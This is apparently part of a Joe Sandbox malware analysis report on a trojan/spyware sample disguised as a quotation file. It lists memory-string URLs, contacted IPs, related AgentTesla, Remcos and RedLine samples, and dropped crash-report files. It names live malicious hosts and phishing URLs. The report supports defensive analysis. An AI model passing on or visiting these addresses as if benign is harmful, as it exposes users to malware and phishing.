http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id21ResponseD	AddInProcess32.exe, 00000006.00000002.1554299366.000000000310F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id10	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id11	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id10ResponseD	AddInProcess32.exe, 00000006.00000002.1554299366.000000000310F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id12	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id16Response	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id13	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id14	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id16	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id17	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id18	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id5Response	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id19	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://r10.i.lencr.org/0	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1566188160.00000000065A1000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1572651872.0000000007BD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1554299366.000000000338A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15ResponseD	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id10Response	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id11ResponseD	AddInProcess32.exe, 00000006.00000002.1554299366.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id8Response	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
212.162.149.48	unknown	Netherlands	64236	UNREAL-SERVERSUS	true
51.195.88.199	s82.gocheapweb.com	France	16276	OVHFR	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1478521
Start date and time:	2024-07-22 17:51:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RFQPO3D93876738.scr.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@9/11@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 207 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172, 52.182.143.212, 93.184.221.240
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, time.windows.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: RFQPO3D93876738.scr.exe

Simulations

Behavior and APIs

Time	Type	Description
11:52:09	API Interceptor	21x Sleep call for process: powershell.exe modified
11:52:13	API Interceptor	20x Sleep call for process: AddInProcess32.exe modified
13:46:55	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	SecuriteInfo.com.Win64.Evo-gen.28044.10443.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	vstdlib_s64.dll.dll	Get hash	malicious	Quasar	Browse	api.ipify.org/
	6OiUEubyA8.msi	Get hash	malicious	Quasar	Browse	api.ipify.org/
	SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exe	Get hash	malicious	Conti, PureLog Stealer, Targeted Ransomware	Browse	api.ipify.org/
	482730621.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	482730621.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sonic-Glyder.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe	Get hash	malicious	Bunny Loader	Browse	api.ipify.org/
	lods.cmd	Get hash	malicious	Remcos	Browse	api.ipify.org/
51.195.88.199	ORDERDATASHEET#PO8738763.scr.exe	Get hash	malicious	AgentTesla, RedLine, SugarDump, XWorm	Browse
	Request for Quotation.js	Get hash	malicious	AgentTesla	Browse
	Revised_June_Order_Document#po839203.js	Get hash	malicious	AgentTesla, SugarDump, XWorm	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s82.gocheapweb.com	ORDERDATASHEET#PO8738763.scr.exe	Get hash	malicious	AgentTesla, RedLine, SugarDump, XWorm	Browse	51.195.88.199
	Request for Quotation.js	Get hash	malicious	AgentTesla	Browse	51.195.88.199
	Revised_June_Order_Document#po839203.js	Get hash	malicious	AgentTesla, SugarDump, XWorm	Browse	51.195.88.199
	RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	141.95.47.215
	Inquiry_GMD_Specifications_7266738879_G#2024.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	141.95.47.215
api.ipify.org	Doc_RFQ.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	New Order.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	DRAFT DOCUMENTS.js	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	AV 122769 - REFUND.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	R6UcgOy5nE.rtf	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	kz7iLmqRuq.exe	Get hash	malicious	Quasar	Browse	104.26.13.205
	http://pub-6d4ffd18b60b47739e1d6be3b9e5e9d4.r2.dev/auth_response.html?folder=anzlbqtvi6&module=	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://982higruaha39f.vercel.app/	Get hash	malicious	Unknown	Browse	104.26.12.205
	https://www.canva.com/design/DAGLaedvVgo/Jbg8hLNrfFSAKWzllyUcYA/edit?utm_content=DAGLaedvVgo&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton	Get hash	malicious	Unknown	Browse	104.26.13.205
	IEnetcache.hta	Get hash	malicious	Cobalt Strike, AgentTesla, PureLog Stealer	Browse	104.26.12.205
bg.microsoft.map.fastly.net	983122525596148.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172
	https://c.1td.eu/	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://sites.google.com/view/sstransportinc/home	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	https://nuasz.excaliburicon.com/?ccvoobkn=YWRhcHByb3ZhbHNAY29uZGVuYXN0LmNvbQ==	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://important-invite.ru/invitersvp/	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	1877020071504017996.js	Get hash	malicious	Strela Downloader	Browse	199.232.214.172
	https://kwxciujqil.joseph-mathieu.workers.dev/?lneigvrscbp=Y25wZ2xhbW91ci1idXNpbmVzc0Bjb25kZW5hc3QuY29t	Get hash	malicious	Unknown	Browse	199.232.210.172
	OODoDv7Qgv.exe	Get hash	malicious	RedLine	Browse	199.232.214.172
	FileZilla_3.67.1_win64_sponsored-setup.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	179761233559106569.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Doc_RFQ.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	http://jsxyv.harshkapoor.com/4aBIud13597bjuP1243nuljqkqqjr30544IFSMZUAJOHXXMTF1309FJTA15297d18	Get hash	malicious	Phisher	Browse	172.67.151.99
	https://parcel-api.delivery-status.com/click/60bb42f9ddf8c92fc1295cfc/forward?to=eyJlbWFpbElkIjoiNjBiYjQyZjlkZGY4YzkyZmMxMjk1Y2ZjIiwidXJsIjoiaHR0cHM6Ly93d3cub2ZmaWNlLmNvbS8==&fb=https://pozq.office365.ws/afiorsphwiarfyaanvyeyaqdxqohds/aaron.ford$us.tel.com/ogvmevifkhiagdg&utm_medium=email&utm_campaign=Delivered&affil=thgemail&utm_courier=RoyalMail&utm_country=GB	Get hash	malicious	Unknown	Browse	104.21.52.202
	#91139_C050.exe	Get hash	malicious	Azorult, GuLoader	Browse	188.114.97.3
	https://webpt.learnupon.com/users/sign_in	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://globalcitizensolutions89584.activehosted.com	Get hash	malicious	Unknown	Browse	104.20.0.15
	https://automarketjobs.com/visionrepartners	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	o7BAd23f4N.exe	Get hash	malicious	LummaC	Browse	104.21.36.154
	https://discovery.silvercloudhealth.com/signup/start/?code=9429330ddb3ea414c097c290e79322a8fc29edc7	Get hash	malicious	Unknown	Browse	104.17.25.14
	uYnTXVroee.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
OVHFR	https://sites.google.com/view/sstransportinc/home	Get hash	malicious	HTMLPhisher	Browse	167.114.173.136
	https://t.co/J8cabPIhNa	Get hash	malicious	Unknown	Browse	144.217.203.237
	PG_320_MPI STEELPROCESS SRL_20240607_100526.xls	Get hash	malicious	Remcos	Browse	91.134.103.134
	DOC 0201_360737031.exe	Get hash	malicious	FormBook	Browse	94.23.162.163
	http://saving-old-seagulls.co.uk	Get hash	malicious	Unknown	Browse	149.56.240.130
	STI04500127990-PDF.exe	Get hash	malicious	GuLoader	Browse	167.114.197.124
	STI04500127990-PDF.exe	Get hash	malicious	GuLoader	Browse	167.114.197.124
	5xUAAMwlnJ.elf	Get hash	malicious	Unknown	Browse	51.222.46.216
	https://1105b03.wcomhost.com/rf/am/3dsece.php	Get hash	malicious	Unknown	Browse	137.74.125.233
	https://1105b03.wcomhost.com/rf/am/3dsec.php	Get hash	malicious	Unknown	Browse	137.74.125.233
UNREAL-SERVERSUS	Banco_BPM__Copia_del_Pagamento.pdf.bat	Get hash	malicious	Remcos	Browse	204.10.160.230
	purchase order - PO-011024-201.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	204.10.160.140
	FORECASTPO 45342130174534213019.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	204.10.160.140
	Purchase, Order no X850580.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	204.10.160.140
	Intesa_Sanpaolo_Avviso di Pagamento_Bollettino.pdf.bat.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	212.162.149.42
	AevLvZx02r.exe	Get hash	malicious	Remcos	Browse	212.162.149.42
	RFQ 002971991.exe	Get hash	malicious	Remcos, GuLoader	Browse	162.251.122.71
	BBVA Colombia__ Aviso de Pago.pdf.bat.exe	Get hash	malicious	Remcos	Browse	204.10.160.230
	b7585402d354395dd4cb9031486b62c65856189cdf27ebf5e0a9a3685970f187_payload.exe	Get hash	malicious	RedLine	Browse	212.162.149.77
	inquiry for AP-103- FM-2400 project.exe	Get hash	malicious	RedLine	Browse	212.162.149.77

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Doc_RFQ.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://automarketjobs.com/visionrepartners	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Get hash	malicious	Unknown	Browse	104.26.12.205
	https://nuasz.excaliburicon.com/?ccvoobkn=YWRhcHByb3ZhbHNAY29uZGVuYXN0LmNvbQ==	Get hash	malicious	Unknown	Browse	104.26.12.205
	25bbed456281ea6f37cb6b295ebd0d1764156e797b4f15e0dc1bbcd7342086a9_payload.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.12.205
	New Order.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	FileZilla_3.67.1_win64_sponsored-setup.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	FileZilla_3.67.1_win64_sponsored-setup.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	DRAFT DOCUMENTS.js	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	http://beonlineboo.com	Get hash	malicious	Unknown	Browse	104.26.12.205

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RFQPO3D93876738._69117b6fa6abf2ab552dc9e9e6eebfb7cefe11e1_bcac15c1_27a11465-d65d-4af1-9f91-68ca1f60d89f\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.19467153132255
Encrypted:	false
SSDEEP:	192:NPow7ilMi0L/oGraWBe+yxD+OIDzuiFfZ24lO8pA:Fow7ilaL/oGramP6duzuiFfY4lO8pA
MD5:	606C0CCD48180F3EF4404805917F52F3
SHA1:	C9FD48DAB88DCBC208BB6F6A00978BAD7A256EFB
SHA-256:	026612C05322528135FC5289691C6A0885CC73EAC1C82F3E6C9D4FEFE5981653
SHA-512:	03D95E6CBEA6788044F0C2A4DB65FA8D4C8FD5B1BB47B9F92B9CBB39C48563ABCE00804FF7B1184B3F28177EA62E4B3F2C983D5FC718FF104ACA95EBDC9D1CB8
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.1.3.7.1.2.8.6.7.3.5.7.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.1.3.7.1.2.9.4.0.7.9.5.4.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.7.a.1.1.4.6.5.-.d.6.5.d.-.4.a.f.1.-.9.f.9.1.-.6.8.c.a.1.f.6.0.d.8.9.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.c.b.8.6.2.0.6.-.e.3.8.9.-.4.c.a.5.-.b.e.7.4.-.d.c.2.9.7.e.c.9.1.d.5.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.R.F.Q.P.O.3.D.9.3.8.7.6.7.3.8...s.c.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.I.g.e.w.i.l.a.j.a.z.i.h.o.r.a.d.i.x.u.w.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.c.8.-.0.0.0.1.-.0.0.1.4.-.5.7.f.5.-.c.8.1.9.4.f.d.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.e.b.2.f.b.0.c.4.9.c.9.e.f.4.e.0.6.6.a.a.7.8.5.1.b.0.4.9.2.b.0.0.0.0.0.0.0.0.0.!.0.0.0.0.f.e.0.b.1.f.b.7.9.2.0.4.7.6.5.6.4.3.e.3.3.8.4.8.a.8.b.1.6.4.e.0.c.f.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA61.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Mon Jul 22 15:52:09 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	469847
Entropy (8bit):	3.222668557458469
Encrypted:	false
SSDEEP:	3072:o8+/UKC+MtuMJ8NBTm8H4nNpcSRnsV1CCqywF503+vfVgZt6PZ:G/DMtuMJ8NBTmqaHKNqE3QeZI
MD5:	456C75D8469A491EBFC682B64C9F0B26
SHA1:	80765CA48C324E951C208019263399914FE62FFC
SHA-256:	3E1AA6A6249B05F5521EC8210968CCD63643388DCF53BD9436D2B22B80EF36E6
SHA-512:	AB64BC55CD33375DF47DEA523032B7EA96DC22AE8B923A8EF5F05C68C209DD02A99E5A67C412183858DD60EEF0D2E765270E9623B309EEA8BA71231040393C0C
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......)..f............t...........H...........$....%...........&.......N..............l.......8...........T............8..g............B...........D..............................................................................eJ......`E......Lw......................T...........%..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC46.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8664
Entropy (8bit):	3.7110370104505193
Encrypted:	false
SSDEEP:	192:R6l7wVeJVEUBz6YNery5cgmfZ84clprOx89bbKGfGJm:R6lXJG86Y0ryigmfVcJb7fJ
MD5:	7FDA6C54C048ED7BCB8C093B5D2608BE
SHA1:	7149FD269B1302329EB16A73F55B1F605AD1048E
SHA-256:	8DAFB7681E5B111C64AE21EE041DBBBD755046223E6DA658E5132141D2051AE2
SHA-512:	60BEF0E8E4EA7FDA3A319023B3D63CAE92873EC25394E1F134204DA07405DA292DB3A22E83F1AEC851125C13B61987CFA3AA92575AF44C7ADB4E2413C403ED26
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC76.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4870
Entropy (8bit):	4.545135606555952
Encrypted:	false
SSDEEP:	48:cvIwWl8zssJg771I904SWpW8VYcl0Ym8M4JUE6Fafyq8vMEeJfUdEd:uIjfqI7jm7VxDJZ5Wx28dEd
MD5:	C4698016157075478C90841615B7CCDF
SHA1:	5D70479CB08BE751BE1CF61DB31F546C7C218705
SHA-256:	99D8B7C552A593AB241342BFEA1E5744CAF1951052DF22334EB4E174AC4D95FC
SHA-512:	4CE35826D5BE6946C45D006A220EC24AD7CE0C1E7DFD88A321A00182973953B8A415C541760B68490956F995AF26668D8F96DA91D79D85B63CC63CF8A4DF8AD2
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="422334" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AddInProcess32.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3191
Entropy (8bit):	5.329865815274249
Encrypted:	false
SSDEEP:	96:lOqiqxwCYqh3oPtI6eqzxJi0aymTqdqlq7qqjqwZ5D:0qiqxwCYqh3qtI6eqzxJi0atTqdqlq7P
MD5:	ED066A53880EFC740C61C7C28CA0DD1F
SHA1:	E8FDD558E86429D209CBBB629EDC7DD48EE7C28B
SHA-256:	04B02EDEE0AD8EB7EB6F3AC4778B5000FC5692DA0D851D4DAEB7601A9BF163DD
SHA-512:	300916FA0C242F73F855677AE908F3C7B3FC324AE879ED31D82147C7CB8B9A5506A2C33813051A02434FF70D8A9793CE892CCB08540067E4137D87474CBE1653
Malicious:	false
Reputation:	low
